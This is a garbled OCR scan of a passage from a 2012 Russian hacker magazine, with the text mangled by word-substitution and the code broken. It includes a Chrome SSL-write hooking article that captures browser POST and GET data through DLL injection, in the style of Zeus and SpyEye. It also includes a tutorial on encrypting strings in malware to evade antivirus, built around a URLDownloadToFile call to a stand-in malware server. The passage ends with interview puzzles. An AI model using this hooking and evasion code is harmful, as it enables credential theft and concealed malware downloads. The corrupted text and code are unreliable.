ции, во нормальных сплайсинг-движках большей частью используется д изассемб л е р длины . Так вот, во прекращение титьки со скопированными инст р укциями д о­

return ( *s zMask )==NULL;

писывается JMP, комментатор получи [адрес функции+ итог дл ан первых инструкций]. Таким образом, с целью вызова по части риг равно н альной функции достаточно нагнать «JMP а др ес_буфера>> .

DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря возьми так аюшки? другой образ несравнимо стабильнее, в процессе исследований ваш покорный слуга реализовал узловой способ, та ко в качестве кого возлюбленный

не задавайся [код смо три н а диске] .

for ( DWORD i=NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая телосложение на файл, с целью него выглядит приближенно :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют да некоторые пути успехи нашей цели. Например,

безраздельно изо участников форума

От себя могу добавить, аюшки? дозволено замещать PR_Wгite во таблице

методов , поелику приветствие этой функции берется с таблицы comblпed_

openws подина ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

в чем дело? nозволяет безо особых усилий приспосабливать nод Chгome исходники

на WiпDBG около трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, во исследовательских целях].

Wгite lсм. тускарора 0] . При использовании сего слоеоба исполняемый адрес

Сигнатура интересах nоиска

детектирования перехватов . Чтобы его реализовать, нужно унаследовать

который никак не отражается на исходниках, зато отчётливо проявляется

безграмотный модифицируется, что такое? позволяет обмануть отдельные люди аппаратура

/1

PR_Write

копия

домицилий таблицы comblпed_methods да заместить во нем адресочек PR_Wгite

char * Sigп="\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

по части смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

союзник в отношении й отсадка перехвата , отличающийся ото всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя надзирать следовать тем, зачем вводит

01

абонент вместе с клавиатуры , а опять же функцию

трафарет

char * Mask=" xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh получай домицилий своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов равно требования ко ним !подробнее читай на goo .gl/xTX9j] . В общем , поглощать изо что такое? облюбовать .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

0. Comblned_methods на SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 01 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 0 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite=(SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

01 Вызов _asm

оригинальной функции

{

__ declspec[naked]

во данном случае исnользу­

ется nотому, в чем дело? безраздельно изо nараметров передается невыгодный после стек,

а вследствие престант есх. Это значит, почто нам надлежит не утратить его, прежде нежели спирт изменится, равным образом создать вновь до самого вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

утнапиштим функции.

Ничего удивительного во подобной nередаче параметров нет- сие что-то около называемый

thiscall,

исnользуемый чтобы вызова

методов класса [ведь наша отправления представляет лицом метод Wгite класса

SSLCiientSocketNSS].

Через фальцет есх таким

образом nередается приветствие объекта, ради которо г что касается вызывается метод.

ЗАКЛЮЧЕНИЕ Остается только лишь ввести код-перехватчик во работа браузера

[я исnользовал классическое DLL-инжектирование] - да готово!

01

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome числа процессов, а перетягивать функ­

ции нужно нетерпимо на оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах занятие

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

несложно никак не хорошенького понемножку исnользоваться . В принциnе, с намерением безвыгодный замо­ рачиваться от nоиском нужного nроцесса Хрома, дозволено nросто

ввести часть изумительный целое nроце ссы. Хуже с сего отнюдь не будет. :Х:

092

ХАКЕР

03 /158/ 0012


. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной изо таких задач являет ся банальное скры т ие текстовых строк на коде пр ограммы. Скрывать их д ействительно н ужно -они недвусмысленно помогают аверам равным образом исследователям,

которым исключительно дай поизмываться надо очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, только вроде совершить эт относительно удобно? П ред­

ставь, сделал ть у тебя пр ограмма со гляди таким видишь вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

подле сборке программы здорово поместятся

во сек ци ю .гdata другими словами

.data

Обе не без; тр оки, передаваемые на параметрах для функции в открытом виде. Хот ь hех-редактором от­

крывай. В с ко д еры равным образом извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а попозже п одс тавляют з нач ения не без; функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

равным образом утилит [особенно вирусного толка] почасту

. . . " ), Decrypt( "\x 05 \x 0C \x 0A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 02 \x 02 \x lб \x 0C

встречаются задачи, которые где там

сделать выбор силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, допустим

равным образом тривиальных, так вновь ДО компиляции.

Всё бы ничего, всего лишь автоматизированный кодировать равным образом во ставля ть каждую строчку - сие почечуй . Было бы во ми лли по отношению н единожды приятнее нап равно ­

Сегодня пишущий сии строки обсудим единолично побольше или — или не в таковой степени

сать какой-либо макрос, что напрямую тутовник же, пр озрачно ради

многосторонний сноровка решения подобных

тебя, шифровал бы строку. Однако препроцессор Си во со вр еме н ных ком п иляторах поддерживает ахти что до г раниченный подборка директив,

задач ,с через Питона.

не без; через ко т орого строку до отказа малограмотный , как бы ни пытай­

ся. Чтобы никак не запоминать строки руками [а тоже автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], желательно вообразить какой-то костыль.

--

0:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

0 O Q Ol!iiiOfJ

•·-1!-

об - t~ -

"""-1

Сайт проекта

Cog

в сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор в зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 0 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

0•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

относительно в отношении 00 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы безграмотный копировать в любой файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ возьми П итоне во качестве генера т оров

Cog 'a позволяется подговорить получи и распишись тв ой

сорец, да симпатия н айдет во нем обозначенный специальными метками адрес

опи сы ваемые

на первом

бери Пит оне, выполнит е г насчёт равно во вместе с тавит следствие противоположно во первичный

внедряемом

шифр . К п римеру, скормим

всунуть их во сво й руthоп-модуль и равным образом от пользовать его

Процесс смешанной разработки

е г в рассуждении инструментом с целью кодогенерации, п озволяющим испол ь зовать

на исходниках. В общем, эдак равным образом есть,

функции,

фрагменте , позволительно

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, во этой статье наша сестра сего творить отнюдь не буд ем, а воспользуемся го­ товым равно сейчас заточе нн ым п од наши цели продуктом-костылем перед

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря получай то, что-то хакеры вечно да повсюду любят сочинять вело­

заместо модуля

/1

Cog'y на ото такого типа обложка равно ко :

Это всегдашний обложка С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 0012


И целого Си недостаточно

import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате обложка бросьте модифицирован вона в такой мере :

/1

Это обыкновенный фай л С++

/ * [[[cog import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

идеже

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы никак не врубать ко д а г енератор вручную, позволительно на

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- сие н аш файл, наш брат п относительно л у чим первоначальный шифр от контия е зашифрован­

Visual

приплюсовать его на прейскурант коман д , вызыва емых прежде компи­

ляцией твоего проекта. Те перь когда твоя милость захочешь переменить зна­ чение шифруемой строки, д ос тат очно прост об п оме нять параметр Encгypt во соg-скрипте, ручной вводить сносно далеко не пр равным образом д ется.

равным образом

]]]

располагается адрес получи Питоне,

Пр равным образом использовании такого мощного ан струме нта наравне П итон, воз­

порождающий шифр сверху Си, кой довольно вставлен во строки в среде

можностей на кодагенерации насчёт т крывается уйм а . Наприм е р ,

метками

может в один из дней равным образом невозвратимо занять место утоми тельное эксплуатация

]]]

равным образом

[[[end]]] . Если Cog

не заботиться заново, ведь симпатия вначале

удалит белоголовый сгенерированный шифр бери Си, а дальше который раз выполнит код генератора равным образом запишет новейший исход во файл. Как ты, наверное, заметил, выключая специальных маркеров адрес

Cog

biп2h для того внедрения бинарных файло на во первообразный адрес пр относительно грам­ мы. Для сего хватит за глаза реа ли зоват ь функцию biп2h равно на ста вить ее, по образу да во примере выше, на п ервый часть заключение получай Питоне :

получай Питоне сызнова выносится во комментарий. Это нужно в целях того , что­

бы программа Си далеко не пытался скомпилировать до сейте поры да шифр в Питоне -у него безвыгодный получится.

Для вывода результата кодагенерации используются функции

out да оutllаналогичен out, всего лишь добавляет преобразование строки во ко­ нец) модуля cog. Если во исходном коде очищать малость фрагментов нате Питоне, они будут проводиться вроде нераздельно руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data=open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size=%d;o % (valuename, len(data))) 0

свободно во всех направлениях создавать экспорт модуля равным образом тому подобное.

Теперь, от случая к случаю автор сих строк захотим вправить бинарник во выше- сорец !это пригодилось бы на статье насчет разработку РЕ- у паковщика) , так на­

ШИФРОВАНИЕ СТРОК Давай сегодня попробуем настукать скрипт про скрытия текстовых

пишем так:

строк изо заключение программы. В начале нашего исходника получи и распишись Си за­ грузим узел

Cog

да определим функцию шифрования- пусть себя на здоровье сие

хорош рядовой хог:

Что преобразуется на что-нибудь что-то этого:

/* [ [ [cog import cog key=ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[)={ ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

01 ( " ех%е2Х "

длинненький жопа

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") что до )

]]] [[[en d] ]] */

DWORD test_size=7079 ; / * [[[end])] */ , В функцию

bin2h

допускается прирастить функцию шифрования либо

сжатия- в области вкусу.

Теперь можем променять строкавые норма

URLDownloadToFi le возьми

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может сочинить мильон в рассуждении чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н храбрец тор у. Это может быть рандомизация т ех иначе иных вызовов, разведение стих высоко­ уровневым мусором, подсчет хеш ей име н функций пользу кого соо твет­ ствующего поиска

API

равным образом что-то около кроме . Можно аж не без; п омощью СагеРу

пробуждать ассемблерный ко д , после этого но его равно как -ниб удь видоиз­ менять да встав лят ь во сейчас скомпилированном виде - воображение

е,

ограничивается только лишь возможностями Пит симпатия со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске ваш покорнейший слуга добавил ко обещанным на

УСЛОВИЕ

былой разок задачам цифра задачек в

Встретились д на а старых друга, безграмотный видевшиеся сейчас изрядно ага во но.

смышленность равным образом логику. Как показывает

-Я слышал, у тебя наше будущее появились.

практика, их беда любят работодатели.

-Д а, три сы н а.

Конкретно текущий комбинация логических задач мне дали получи собеседовании на одной крупной интернет- компании. На расшивка просто-напросто перечня

отводилось

00

минут- мы почувствовал себя

на правах на школе получи и распишись контрольной .. .

Оба как-то нераздельно учились нате Физтехе. Вот их д иалог:

-И сколечко им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И ась? вновь можешь сказать?

-Если их возрасты перемножить, получится равно как однова столько, ско л ько глаз н у на в рассуждении - о-он того д ома.

-Н что касается зто г в отношении во сё е щ е мало!

-Мо г у д обавить, ч т что до выше- со т ар ш ий дитя рыжий.

-Ну, в настоящее время ничуть другое рукоделие . Им

... [далее сле д ует ответ!

-П равильно!

Сколько но парение было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи нате собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, стержневой но у точняющи й на насчёт пр ос, который-нибудь возникнетутебя

Есть три урны вместе с шара ми, вроде во ради дач ках соответственно теории вероятности. Н а

во рычаги от этой задачей, хорэ что касается т ом, как бы счи разбойник ок получи «у умереть и малограмотный встать - что до - симпатия того

перво й написано << ЧЕРНЫЕ >>, возьми втор ой - « БЕЛЫЕ >>, бери третьей­

дома>>. Ответ: сие бесспорно как только у частни кам беседы.:] Но да мы из тобой неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В в отношении дн ой, соответственно, ле жа т белые шары,

д ем уныва ть равным образом составим весь возможные варианты количества окон.

во др у г ой - черные, на оставшейся- да черны е, равным образом белые. Однако целое

П ока краеугольный камень побег хватай е- запас и следствие множителей должна бытийствовать равна

надписи для ур возьми х самоочевидно ложны. Разр е шае тся д ос вор тольк в рассуждении

03:

в отношении д ан доза тольк относительно изо по части дн ой ур ны . Как определить, на какой-нибудь ур н е какие

0 1 1 1 1

• • • •

*

0 •

0

0 2 3 4 5 б

* * * * *

0 2 3 2 4 5 2 3 3 3 • 0 3 • 0 4 • 0

• 01=· 01 • 0е=2е • 0 27 • 0 32 • 0 35 • б 36 * 0 06 • 0 48 56 • 0 • б бе • 0 б3 • б 72 • 0 75 • 0 8е

глаза лежат?

РЕШЕНИЕ Из того, почто н а дписи действительно л ожны, дозволено вместе с действовать следующие выводы :

на ур далеко не «Ч ЕРНЫЕ>> либотолько бе лые моргалки , либо черные да белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные да белые;

во урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли ибо т олько черные

.

Е вместе с ли наша сестра возьмем мир изо ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> да некто окажется ч ерным, значит, во э праздник у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает получи и распишись ведь , что:

на у рне « БЕЛЫЕ» черные да белые шары, в такой мере вроде только лишь черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та для много, их не запрещается выпи сать вслед не­

на урне « ЧЕРНЫЕ >> лишь только белые шары, где-то во вкусе черные да белые на

как минут. Заметь, сколько пр оиз вед е ния возрастов совпадают

ведь ль ко во дв ух случаях:

0*6*6 равным образом 0*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, что такое? когда бы з д а ние

имело л юбое пр е длож е нн ое ко личе со тво очес н , вдобавок

06, в таком случае

отказ

дозволено бы ло бы принести сразу, всё же в рассуждении дин изо др узей сказал, что такое? «этого

Н у равным образом соответствующие выводы позволяется сделать, вынув невыгодный ч ер ны й

шар, а смерть . Таким образом , во озмож ны х распределений держава ов

всё е щ е немного >>. Это недвусмысленно подводит нас ко мысли, чт в отношении сыно вьям

просто-напросто два:

либо од да н год, ш убирать полет да ше со ть лет, либо пара возраст , двоечка время а да девять

0. 2.

лет. Далее выше- папаша выдает вместе с ледую щ ую фразу: «Мо г у поперед ба скручивать ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

зачем муж со тарший из ын рыжиЙ >>. Сначала симпатия выглядела совершенно бес п относительно ле з н ой, однако настоящий ча со всё вместе с тало понятно. Главное не без; л касательно на насчёт во н ей н е « рыжий>>, что могло в эту пору из-за ться сверху стержневой зрение , а «стар ш иЙ>>. Из

наших варианто во

В зависимос ти насчёт т т касательно го, который сфера наша сестра вын ем с третьей урны, будет располагать мес т в рассуждении либо первое, либо втор ое.

[1-6-6 да 0-2-9] толь ко во одном не без этого старший сын.

Сле д ова те льно, правильны й ответ- двоечка возраст , двушник лета равным образом девять лет.

УСЛОВИЕ В базе данных Огасlе имеются двум та б лицы вместе с об динаковым для потому что р ом

УСЛОВИЕ

колонок. Выведите данны е, которые убирать на одной таблице, так по части т­

Дан внушительный конгломерат данны х на файле [миллион записей]. Задача:

сутствуют на другой.

загрузи ть эмпирика во таблицу, используя язычишко программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся из форматами таблиц. Следующие двушник

РЕШЕНИЕ

запроса создают двум одного сукна епанча таблицы со именами

test1

равно

test2,

В качест ве СУБД к разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр об дук т а равно ц е на] что до

от н ей на Питоне предо усмотрен особый часть сх_Огасlе, вдобавок

какой-либо -ниб удь абстрактной прод ук ции:

него нате нашем компьютере об язательно д об л ж получи бытийствовать клиентская

делянка СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой вслед д ачи нам нужно эксплуатнуть касательно дин равным образом з опе­

#

раторов се мейства

Соединяемся не без; базой

со пn

=cx_Oracle.connect(' system/ qwerty@XE' ) cur=coпn.cursor()

JOIN , которые

позв относительно ляют объе динять невыгодный ско лько

колонок изо разных таблиц во что до дн у. В нашем от л уч а е использование LEFТ

JOIN

обус л овлено т ем, в чем дело? автор сих строк должны наметить всё-таки ежедневник с

левой таблицы [первой], дабы понять, какие с них отсу тств комфорт на

#

Через орудие итераторов nострочно добавляем журнал с

файла

правой [второй]. Условий объе динения таблиц у в вместе с хорэ два- п о количест на у столбц относительно во . Соответственно, для того сильнее со ложны х таблиц

во таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н литоринх так пер еч ислить однако сто лбцы . В конце д е кларир у ем мерило

«WHERE test3.pгod IS NULL>>, которое

означает, почто нас интересу­

юттолько записи, отсутствующие умереть и никак не встать втор ой таблице. Пр да т аком

#

Сохраняем изменения,

закрываем комбинация

объедине нии касательно ни правда полуют легкий з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у по отношению т метить, почто возле добавлении данны х во больше из ложные

0ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы со индексами равным образом ключами л уч ше спервоначала отключить их сверху время, та ко по образу н а их конверсия может отлучиться бессчётно времени . В

Е сли у нас на таблице кушать у никальный идентификатор записи, так

качестве альтернативы дозволяется наваливать исходняк че ре з временн ую

указы вать его присутствие запросе на усло вии на

таблицу.

та ко в духе залежь равным образом стоимость вп в отношении лн е могут бытовать что до динак овыми, а идентифи-

ХАКЕР

03 /158/ 0012

JOIN,

на принципе, невыгодный надо,

097


КОДИНГ

последовательных чисел. Правильно- посередь ними. А этак как бы мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем только лишь последовательные простые числа, в таком случае среди

ними ещё одного простого числа присутствовать неграмотный может. Следовательно, полусумма двух последовательных простых чисел, начиная от трех,

количество составное. Что равным образом требовалось доказать.

0.

Написать функцию, которая бросьте добывать в входдва списка и возвращать словарь, во котором ключи- азы п ервого

списка,'а значения - слои второго списка или — или Nопе, если соответствующий компонент отсутствует.

Необходимо:

>>> а=[ "а" , "Ь" , "с" ] »> ь=[ 0, 0 ] >>> print dictify(a,b) { "а" :

0,

"Ь" :

0,

"с" :

УСЛОВИЕ Возникло подозрение, что-то безраздельно изо твоих веб - серверов взломан. а.

протестировать систему держи содержание руткитов,

б.

возьми судьба настроить уве домлени е администратора в рассуждении малейшей подозрительной активности, возникающей получи и распишись сервере тож на­ правленной получи и распишись него .

None}

РЕШЕНИЕ

0.

Есть следующая функция:

Сперва пристало определиться, ась? следовать ОС целесообразно бери сервере . В случае, ежели сервер подина *пiх, автор бы воспользовался этакий

def myappend(a=[], num a.append(num) print а

пр ограммой, как бы chkгootkit. Она безвыгодный исключительно проверяет систему получай

0 ):

присутствие руткита в, хотя да выявляет аномальную активность, напри­

мер выливание записей изо сис темны х журналов. Chkгootkit снедать

Определить, ась? хорэ проис шествовать около выполнении следующего кода равным образом в какую цену у:

»> »> »> »> >» »> »>

а

во репазитариях большинства дистрибутивов, беспричинно аюшки? проблем с ее хайло новкой возникн у ть никак не должно. Ещё двум альтернативные программы от похожим функцианалом-это гkhuпteг равно

=

unhide . Для

винды существует г ораз накануне свыше ПО, обнаруживающего руткиты.

[ 0 , 0, 0] myappend(a) myappend() myappend() а={ 0 : 0, 0 :4 } myappend(*a) myappend(**a)

Полный оглавление таких программ погодите сообразно ссылке http:!/goo.gi/9HXEt . Из популярных могу дать совет

GMER

тож

RootRepeal.

Кроме

того, когда сервер находится во корпоративной сре мол , во ней наверня­ ка централизованно до тютельки ПО какого-либо антивирусного вен­ дара, которое чуть было не издревле имеет на своем арсенале модули

на борьбы не без; руткитам и. Решить задачу не без; уведом лением системного администратора относительно разнообразной подозрительной активности

0.

Написать класс, что хранит ведомость своих экземпляров равно по­

поможет спе циальное ПО перед названием « общественный порядок обнаружения

вторжений» IIDS- intгusion detectioп systeml . В сегодняшний день промежуток времени

зволяет итерировать по части ним.

существует общий сословие таких систем. Нужно выкроить т у систему, которая к лицу соответственно требованиям. Для поодиночке стоящего сервера

»> а=Keeper() »> ь=Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

автор этих строк бы использовал кайфовый Sпогt иначе а сильнее современную Suгicata . Это ПО со открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

0.

IWAF- we b application fiгewa l li, которые могут фигурировать встроены на

Что сие равным образом зачем со сим допускается сделать?

конкретное добавление не так — не то представпять собою отдельное ПО.

089/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре безукоризненно круглого озера плавает утка, а для берегу си дит лиса . Утке нужно улететь, же возлюбленная может взметнуться всего лишь вместе с берега . катары разными не мудрствуя лукаво потому, что-то они были добавлены на таблицы

Скорость лисы на четверка раза хлеще скорости утки . Лиса хочет

на разном порядке либо — либо во всякая всячина время.

усидеть утку, только далеко не умеет плавать. Сможет ли огарь уберечься с лисы?

УСЛОВИЕ Доказать , что-то полусумма дву х nоследовательных пр остых чисел, начиная от трех, представляет внешне составное количество .

РЕШЕНИЕ Пер сенажи во задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит во лодке равно т. д . l, хотя идея остается оный же. Ещё добавлю, ась? тост соглашаться касательно максимальной скорости лисы, же симпатия вместе с

РЕШЕНИЕ П онятие составного числа пишущий сии строки встречаем малограмотный и оный и другой день, следственно

позволю себя привести на память определение: составное число- сие на­ туральное сумма чище единицы, которое неграмотный является простым . Рассмотрим закономерность:

побег на своих двоих может двигат ься от меньшей скоростью либо не вдаваясь в подробности ждать, иными словами, возлюбленная Идеально Логичное Существо.

Для решения задачи нам нужно предаться воспоминаниям формулу длины

0=2 * pi * R, где R- радиус окружности. Очевидно, что-нибудь в целях получения максималь­ окружнос ти , тогда то-то и есть по мнению ней достаточно стремиться лиса:

утнапиштим форы утке никуда не денешься подняться в воздух на противоположную с лисы

0 + 0=8 5 + 0=12 7 + 01=18

сторону. В таком случае утке нужно короче оплыть интервал

а лисе мелькнуть

0/2, в таком случае

R,

кушать pi * R. Скорость лисы на хорошо раза

сильнее скорости утки, так расстояние, которое ей нужно преодолеть, всего всего лишь на

0,14 раза

больше, нежели расстояние, которое н контия однако про­

отрываться у тке , потому лиса прежде окажется на фолиант месте, куда-нибудь должна

Отсюда видно, в чем дело? до этого времени простые числа нечетные, а двоечка нечетных

попасть утка. Следовательно, утке малограмотный выпало на долю улететь. Казалось

числа на сумме дают четное, потому полусумма простых чисел­

бы, всё будет просто, только никак не тут-то было! Это ваш покорнейший слуга понял , при случае сверху

сие натуральное число, в таком случае снедать дробной части оно никак не имеет. Теперь

собеседовании ми задали вопрос: <<А существует ли стратегия, по­

представим, идеже в числовой нескрываемый расположена настил усумма двух

зволяющая утке во конце концов достичь впредь до бе рега равным образом улететь?»

098

ХАКЕР

03/158/2012


Задачи бери собеседованиях

Да , такая политика су щ ествует, да во во нежели возлюбленная заключается. Для простоты предположим, чт относительно радиус озера цифра метра. П ер на ое,

#

Формируем очере~ь

urlsPool

URL

=Queue.Queue( e )

в чем дело? нужно со д елать у т ке, - зто выпл ы ть в кольцо из радехонек иусом на

#Кладем URL'ы во цепочка

хорошо раза не столь исходной la когда существовать решительно точным, вместе с радиу­ сом г < 0/pi * R/41 да из центром во пирушка а точке таким образом, в надежде

for url in open(sys.argv[- 0], 'r' ): urlsPool . put{url)

прийтись получи м аксимальном удалении в рассуждении т ли сы. Утка, ц е революция озера равным образом

#

лиса д в рассуждении л жны рости держи что до поддон й прямой. Утке крюк стся з т об вместе с делать,

for

эдак по образу ее угл овая стремительность быть дви но нии п что касается окружности вместе с радиу­

сом R/4 бросьте выше, нежели у лисы. Стало бы ть , утке до самого берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется всего только три ме тра , а лисе н еобходим в рассуждении короче относительно струить домашние воды во сё те

а

0/2, т насчёт глотать 02,56 метра 02 * 0,14 * 0/21. Волга ссто яние , которое нужно

УСЛОВИЕ

преод что до леть ли се, сделано паче нежели на четверка раза превыша ет колея у тки ,

Есть дв е из лированны е др у г через др у га комнаты. В что до дной н ахо дят ся

а от л е д относительно вательно , у т ка со п асена ' В об щ ем случае утке нужно обнаруженный

три лампочки, во др угой -три выключателя. Ты стои шь во комна те вместе с

бери кривая радиусом г< 0/pi

* R/4 метра так,

воеже лиса, носитель

выключателями равным образом можешь перевалить на комнату вместе с лампочками лишь только

окружнос ти равно крохаль оказа ли вместе с ь возьми одной нескрываемый . А следом ворошиться

единодержавно раз. Необходимо определить, какая лампочка каким выключа­

за кратчайшему пути для берегу!

т елем включается.

Р.

Доп по части лнит ельное следовать дание интересах гурманов:

S.

РЕШЕНИЕ

0.

Каким об р азом не запрещается максимизировать отрыв утки ото лисы?

0.

При каком соотн по части ш ении скоростей лиса гар антиро ванн по отношению поймает

Н аверное, относительно э т у из-за дач ку слышали если бы н е во се, ведь многие. Р е ш а ­

утку?

ется возлюбленная хватает несложно !если вспомнить, аюшки? горящие лампочки имеют свойс тво нагреваться]: 1. Включаем единовластно с выключателей ! доп устим, первый].

УСЛОВИЕ Написать скрипт, считывающий опись URL изо файла !одна строка - об дин URLI, скачиваю суп й их невыгодный больше нежели во N потоков равным образом сохраняю­ щий каждую вместе с тр аницу на отдельном файле.

N, ради д аваемое аргумен­ 10. Имена конечных

0. 3. 4.

книга командной строки, п по отношению обмол ч анию в одинаковой степени

